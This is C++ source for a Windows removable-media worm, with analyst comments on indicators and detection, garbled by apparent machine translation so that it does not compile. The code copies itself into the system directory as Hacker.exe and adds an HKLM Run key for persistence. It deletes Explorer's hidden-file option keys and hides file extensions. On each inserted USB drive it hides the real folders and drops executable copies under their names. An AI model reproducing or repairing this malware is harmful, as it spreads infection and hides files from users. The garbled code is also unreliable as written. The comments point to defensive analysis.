# Include "stdafx. H"
# Include <windows. h>
# Include "resource. H"
//////////////////////////////////////// /////////////
// dobad: given a drive root path in `drivebuf`, enumerates the entries directly
// under it. For every directory that is not already hidden or system it
// (1) sets the Hidden and System attributes on the directory and (2) copies the
// running executable to a file named from the directory's path plus an ".EXE"
// suffix.
//
// Analyst notes:
// - This is the folder-masquerade pattern seen in removable-media worms: the
//   real folder drops out of a default Explorer view and an executable with the
//   folder's name sits in its place.
// - Observable artefacts: top-level directories on a removable volume that carry
//   Hidden|System, each with a sibling "<dirname>.EXE"; all of those siblings are
//   copies of one source image, so they share a single hash.
// - NOTE(review): the listing appears to have been through machine translation
//   (identifier case, spacing and format strings are altered) and does not
//   compile as shown; exact strings should be confirmed against a sample.
Void dobad (char drivebuf []);
Void dobad (char drivebuf [])
{
Cfilefind finder;
// Build a string with wildcards
Cstring strwildcard (drivebuf );
Strwildcard + = _ T ("*.*");
// filesource receives the path of the currently running module (the copy source);
// filenew is the scratch buffer for each destination path.
Char filesource [max_path] = {0 };
Char filenew [max_path] = {0 };
Hmodule = getmodulehandle (null );
Getmodulefilename (hmodule, filesource, max_path );
Closehandle (hmodule );
// Start working for files
Bool bworking = finder. findfile (strwildcard );
While (bworking)
{
Bworking = finder. findnextfile ();
// Skip the "." and ".." entries.
If (finder. isdots ())
Continue;
// The original comment below mentions recursion, but no recursive call is
// visible in this function: only entries directly under `drivebuf` are handled.
// If it's a directory, Recursively search it
If (finder. isdirectory ()&&! Finder. issystem ()&&! Finder. ishidden ())
{
// Hide the real directory; if the attribute change fails, move on to the next entry.
If (! Setfileattributes (finder. getfilepath (), file_attribute_hidden | file_attribute_system) // | file_attribute_system
Continue;
// Destination name is the directory path followed by the ".EXE" literal
// (the format string is garbled in this listing).
Sprintf (filenew, "% S % s", finder. getfilepath (), ". EXE ");
// Third argument true: a file already present under that name is left in place.
Copyfile (filesource, filenew, true );
}
}
Finder. Close ();
}
//////////////////////////////////////// /////////////
# Include <DBT. h>
// File-scope scratch buffer that ondevicechange fills with a drive root path.
Char diskpath [5] = {0 };
// ondevicechange: handler for the WM_DEVICECHANGE payload forwarded by the
// window procedure.
// - On DBT_DEVICEARRIVAL it walks the logical-drive bitmask, builds a root path
//   for each set bit, and for the first drive that is DRIVE_REMOVABLE and answers
//   GetVolumeInformation it calls dobad on that root, then stops scanning.
// - On DBT_DEVICEREMOVECOMPLETE it shows a message box.
// The same default LRESULT is returned for every event.
//
// Analyst note: the trigger is the insertion of removable media, so the
// behaviour to watch for is a background process writing executables to a
// removable volume immediately after a device-arrival event.
Lresult ondevicechange (hwnd, wparam, lparam );
Lresult ondevicechange (hwnd, wparam, lparam)
{
// Char U [4];
// lpdb is assigned from lparam but is not read anywhere in the visible body.
Pdev_broadcast_hdr lpdb = (pdev_broadcast_hdr) lparam;
// Bitmask of the drive letters currently present.
DWORD alldisk = getlogicaldrives ();
If (alldisk! = 0)
{
Switch (wparam)
{
Case dbt_devicearrival:
{
For (INT I = 0; I <40; I ++)
{
// Tests the lowest bit of the mask (expression is garbled in this listing).
If (alldisk & 1) = 1)
{
// Builds "<letter>:\" in diskpath, with the letter computed as 'C' + I.
Sprintf (diskpath, "% C", 'C' + I );
Strcat (diskpath ,":\\");
// Only removable drives are of interest.
If (getdrivetype (diskpath) = drive_removable)
{
// A successful volume query is used as the "media is present" check.
If (getvolumeinformation (diskpath, 0, 0, 0, 0, 0 ))
{
// MessageBox (null, diskpath, "1", mb_ OK );
Dobad (diskpath );
// Only the first matching drive is processed per event.
Break;
}
}
}
// Advances to the next drive bit; presumably a right shift before the text
// was garbled. TODO confirm against a sample.
Alldisk = alldisk> 1;
}
}
Break;
Case dbt_deviceremovecomplete:
MessageBox (null, "Stop USB flash drive", "virus prompt! ", Mb_ OK );
Break;
}
}
Return lresult ();
}
// wndproc: window procedure for the window created in createmywindow.
// Its only active role is to forward WM_DEVICECHANGE to ondevicechange.
// WM_CLOSE and WM_DESTROY return without reaching DefWindowProc, so the default
// close handling is not run for this window; every other message goes to
// DefWindowProc.
Lresult callback wndproc (hwnd, uint message, wparam, lparam );
Lresult callback wndproc (hwnd, uint message, wparam, lparam)
{
Switch (Message)
{
Case wm_create:
Break;
Case wm_devicechange:
// Device arrival/removal notifications are handed to ondevicechange.
// If (modify_data.isupan)
Ondevicechange (hwnd, wparam, lparam );
Break;
Case wm_close:
Return false;
Case wm_destroy:
Return false;
Default:
Return defwindowproc (hwnd, message, wparam, lparam );
}
Return 0;
}
// createmywindow: registers a window class, creates a top-level window from it,
// hides the window, sends it one WM_DEVICECHANGE with zero parameters, and then
// runs the message loop. Returns 1 once GetMessage ends the loop.
//
// Analyst notes:
// - The window is never shown (SW_HIDE); it exists to receive device-change
//   broadcasts, which reach top-level windows without further registration.
// - The class name and window title literals below are candidate indicators when
//   enumerating windows on a suspect host, but spacing in this listing is
//   garbled, so confirm the exact strings against a sample.
Int createmywindow ();
Int createmywindow ()
{
MSG;
Wndclass wndc;
Lpstr szappname = "webdown ";
Wndc. Style = 0;
// Messages for this class are handled by wndproc.
Wndc. lpfnwndproc = wndproc;
Wndc. cbclsextra = 0;
Wndc. cbwndextra = 0;
Wndc. hinstance = NULL;
Wndc. hicon = NULL;
Wndc. hcursor = NULL;
Wndc. hbrbackground = (hbrush) (color_window + 1 );
Wndc. lpszmenuname = NULL;
Wndc. lpszclassname = szappname;
Registerclass (& wndc );
Hwnd = createwindow (szappname, "hacker ",
Ws_overlappedwindow, cw_usedefault, cw_usedefault,
Cw_usedefault, cw_usedefault, null );
// Keep the window invisible to the user.
Showwindow (hwnd, sw_hide );
Updatewindow (hwnd );
// One synthetic WM_DEVICECHANGE at start-up; wparam is 0, which matches neither
// case in ondevicechange's switch.
Sendmessage (hwnd, wm_devicechange, 0, 0 );
// Standard message pump; this keeps the process alive and listening.
While (getmessage (& MSG, null, 0, 0 ))
{
Translatemessage (& MSG );
Dispatchmessage (& MSG );
}
Return 1;
}
//////////////////////////////////////// /////////////
// deletesubkeytree: deletes the registry key `lpsubkey` under `hkey` together
// with all of its descendants. It opens the key, repeatedly enumerates the child
// at index 0 and recurses into it, then closes the handle and deletes the key
// itself. Nothing is returned; both `return lresult` lines are commented out, so
// callers cannot tell whether the deletion succeeded.
Void deletesubkeytree (hkey, lpctstr lpsubkey );
Void deletesubkeytree (hkey, lpctstr lpsubkey)
{
Long lresult;
Hkey hsubkey;
DWORD dwindex, cbname;
Char szsubkey [512];
Filetime ft;
Lresult = regopenkeyex (hkey, lpsubkey, 0, key_all_access, & hsubkey );
// On an open failure the handle is closed and execution still continues below,
// because the early return is commented out.
If (lresult! = Error_success)
{
Regclosekey (hsubkey );
// Return lresult;
}
// dwindex is never incremented: each pass asks for the first remaining child.
Dwindex = 0;
// cbname is set once, before the loop, to the capacity of szsubkey.
Cbname = sizeof (szsubkey)/sizeof (szsubkey [0]);
While (error_success = (lresult = regenumkeyex (hsubkey, dwindex, szsubkey, & cbname, null, null, & ft )))
{
Deletesubkeytree (hsubkey, szsubkey );
}
Regclosekey (hsubkey );
// With the children handled, remove the key itself.
Lresult = regdeletekey (hkey, lpsubkey );
// Return lresult;
}
// fuckreg: changes Explorer's hidden-file and file-extension settings in the
// registry. In order:
//   1. Creates or opens HKLM ...\Explorer\Advanced\Folder\Hidden and writes a
//      string value named "text".
//   2. Deletes the "nohidden" and "showall" subkeys of that key, with all their
//      children, through deletesubkeytree.
//   3. Sets the DWORD "hidefileext" to 1 under HKCU ...\Explorer\Advanced.
//
// Analyst notes:
// - The two deleted subkeys hold the definitions behind the Folder Options
//   choice between showing and not showing hidden files. With them gone the user
//   cannot switch hidden files back on from that dialog, which keeps the
//   directories hidden by dobad out of sight.
// - hidefileext = 1 hides extensions for known file types, so a "<folder>.EXE"
//   copy is displayed without its ".EXE" suffix.
// - Detection: registry auditing on the Folder\Hidden subtree (key deletion) and
//   on the HideFileExt value catches this. Remediation has to restore the two
//   deleted subkeys as well as remove the dropped files.
// - Path spacing in the literals below is garbled in this listing.
Void fuckreg ();
Void fuckreg ()
{
Hkey;
Regcreatekey (HKEY_LOCAL_MACHINE, "SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Advanced \ Folder \ Hidden", & hkey );
// Marker string written into the "text" value of the Hidden key.
Tchar * valuea = _ T ("the machine has been poisoned Program Test-Jack ");
Regsetvalueex (hkey, "text", null, REG_SZ, (lpbyte) valuea, (DWORD) (lstrlen (valuea) + 1 ));
Regclosekey (hkey );
// Remove the subtree behind the "do not show hidden files" option.
Lpctstr lpsubkey1 = "SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Advanced \ Folder \ Hidden \ nohidden ";
Hkey hkey1 = HKEY_LOCAL_MACHINE;
Deletesubkeytree (hkey1, lpsubkey1 );
// Remove the subtree behind the "show hidden files" option.
Lpctstr lpsubkey2 = "SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Advanced \ Folder \ Hidden \ showall ";
Hkey hkey2 = HKEY_LOCAL_MACHINE;
Deletesubkeytree (hkey2, lpsubkey2 );
// Per-user setting: hide extensions for known file types.
Hkey hkey3;
Regcreatekey (HKEY_CURRENT_USER, "SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Advanced", & hkey3 );
DWORD valuea3 = 1;
Regsetvalueex (hkey3, "hidefileext", null, REG_DWORD, (const byte *) (& valuea3), 4 );
Regclosekey (hkey3); // close the handle
}
//////////////////////////////////////// /////////////
# Include <shellapi. h>
# Pragma comment (linker, "/align: 4096 ")
# Pragma comment (linker, "/subsystem: \" WINDOWS \ "/entry: \" maincrtstartup \"")
// main: entry point. Visible sequence:
//   1. Derives a path from its own module file name and passes it to ShellExecute.
//   2. Creates a named mutex and exits if it already exists (single instance).
//   3. Copies its own image into the system directory under the Hacker.exe name.
//   4. Opens or creates the HKLM ...\CurrentVersion\Run key and writes a value
//      pointing at that copy, so the copy starts at logon.
//   5. Calls fuckreg (Explorer settings) and createmywindow (hidden window and
//      message loop that reacts to removable-media arrival).
//
// Indicators taken from this listing (spacing is garbled by translation, so
// confirm the exact strings against a sample before using them in rules):
//   - mutex name: the literal passed to createmutex below
//   - file: Hacker.exe in the Windows system directory
//   - Run value: "hacker -- Jack" under HKLM ...\CurrentVersion\Run
// Both the system-directory write and the HKLM Run write need administrative
// rights; running as a standard user blocks this persistence path.
Int main ()
{
//////////////////////////////////////
Char fullpath [max_path];
Hmodule = getmodulehandle (null );
Getmodulefilename (hmodule, fullpath, max_path );
Cstring strpath = (cstring) fullpath;
// Trims the trailing part of its own file name and appends a backslash to form
// `path`. Presumably this lets a dropped "<folder>.EXE" copy open the real,
// now-hidden folder when the user double-clicks it. TODO confirm; the verb
// string in the ShellExecute call is garbled in this listing.
Int ret=strpath.reversefind(_t('.exe '));
Cstring Path = strpath. Left (ret-3) + _ T ("\\");
// MessageBox (PATH );
ShellExecute (null, "cmde", path, null, null, sw_shownormal );
// ShellExecute (null, "open", null, null, path, sw_shownormal );
// Single-instance guard: a second copy sees ERROR_ALREADY_EXISTS and exits.
Handle m_hmutex = createmutex (null, false, "alalmn Jack is only used for testing !! ");
If (getlasterror () = error_already_exists)
{
Closehandle (m_hmutex );
M_hmutex = NULL;
Exitprocess (0 );
}
///////////////////////////
// filesource = path of the running image; filenew = destination in the system directory.
Char filesource [max_path] = {0 };
Char filenew [max_path] = {0 };
Hmodule hmodule1 = getmodulehandle (null );
Getmodulefilename (hmodule1, filesource, max_path );
Closehandle (hmodule1 );
Getsystemdirectory (filenew, max_path );
Strcat (filenew ," \ Hacker.exe ");
///////////////////////////
// Third argument true: a copy already present in the system directory is not overwritten.
Copyfile (filesource, filenew, true );
// Persistence through the machine-wide Run key.
Hkey = HKEY_LOCAL_MACHINE;
Char lpsubkey [256] = "SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run ";
Hkey phkresult;
Int Len = sizeof (filenew );
// Open the Run key, creating it if the open fails.
If (: regopenkeyex (hkey, lpsubkey, 0, key_all_access, & phkresult )! = Error_success)
{
: Regcreatekeyex (hkey, lpsubkey, 0, null, reg_option_non_volatile, key_set_value | key_create_sub_key | key_write, null, & phkresult, null );
}
// The query is made against hkey using lpsubkey as the value name; when it does
// not succeed, the Run value is written with the path of the copy.
If (regqueryvalueex (hkey, lpsubkey, null, null, (unsigned char *) & filenew, (unsigned long *) & Len )! = Error_success)
: Regsetvalueex (phkresult, "hacker -- Jack", 0, REG_SZ, (lpbyte) filenew, (DWORD) (lstrlen (filenew) + 1 ));
: Regclosekey (phkresult );
///////////////////////////
// Apply the Explorer registry changes, then block in the hidden window's message loop.
Fuckreg ();
Createmywindow ();
//-------------------------
// While (1) // create an endless loop, otherwise the main thread exits
//{
// Sleep (1, 1000 );
//}
//---------------------
Return 0;
}